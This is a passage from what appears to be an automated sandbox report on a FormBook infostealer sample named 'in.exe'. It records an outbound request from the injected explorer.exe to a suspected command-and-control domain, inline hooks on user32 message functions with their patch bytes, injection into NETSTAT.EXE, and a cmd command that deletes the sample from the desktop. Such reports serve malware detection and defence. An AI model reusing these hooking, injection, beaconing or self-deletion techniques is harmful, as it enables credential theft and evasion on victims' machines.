                                                Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BrexZeIznVArJdY5nYE9ATiKEnq5umVgwyMBtdz0YLTpWwztglz+HJIoUEkyZIlRq7W81AgncmjqvBemHNJKjw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.749753198.54.117.21680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 21:12:15.271634102 CET10592OUTGET /uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI HTTP/1.1
                                                Host: www.concur.design
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Code Manipulations

                                                User Modules

                                                Hook Summary

                                                Function NameHook TypeActive in Processes
                                                PeekMessageAINLINEexplorer.exe
                                                PeekMessageWINLINEexplorer.exe
                                                GetMessageWINLINEexplorer.exe
                                                GetMessageAINLINEexplorer.exe

                                                Processes

                                                Process: explorer.exe, Module: user32.dll
                                                Function NameHook TypeNew Data
                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE3
                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE3
                                                GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE3
                                                GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE3

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: in.exe PID: 6496 Parent PID: 5700

                                                General

                                                Start time:21:09:49
                                                Start date:13/01/2021
                                                Path:C:\Users\user\Desktop\in.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\in.exe'
                                                Imagebase:0xb40000
                                                File size:237568 bytes
                                                MD5 hash:CC35BE28C18578D43849919AC1025D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: in.exe PID: 6548 Parent PID: 6496

                                                General

                                                Start time:21:09:51
                                                Start date:13/01/2021
                                                Path:C:\Users\user\Desktop\in.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\in.exe'
                                                Imagebase:0xb40000
                                                File size:237568 bytes
                                                MD5 hash:CC35BE28C18578D43849919AC1025D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: explorer.exe PID: 3292 Parent PID: 6548

                                                General

                                                Start time:21:09:55
                                                Start date:13/01/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:
                                                Imagebase:0x7ff662bf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Analysis Process: NETSTAT.EXE PID: 6264 Parent PID: 3292

                                                General

                                                Start time:21:10:10
                                                Start date:13/01/2021
                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Imagebase:0xc30000
                                                File size:32768 bytes
                                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Analysis Process: cmd.exe PID: 5916 Parent PID: 6264

                                                General

                                                Start time:21:10:14
                                                Start date:13/01/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\in.exe'
                                                Imagebase:0x1240000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Analysis Process: conhost.exe PID: 6428 Parent PID: 5916

                                                General

                                                Start time:21:10:15
                                                Start date:13/01/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff774ee0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >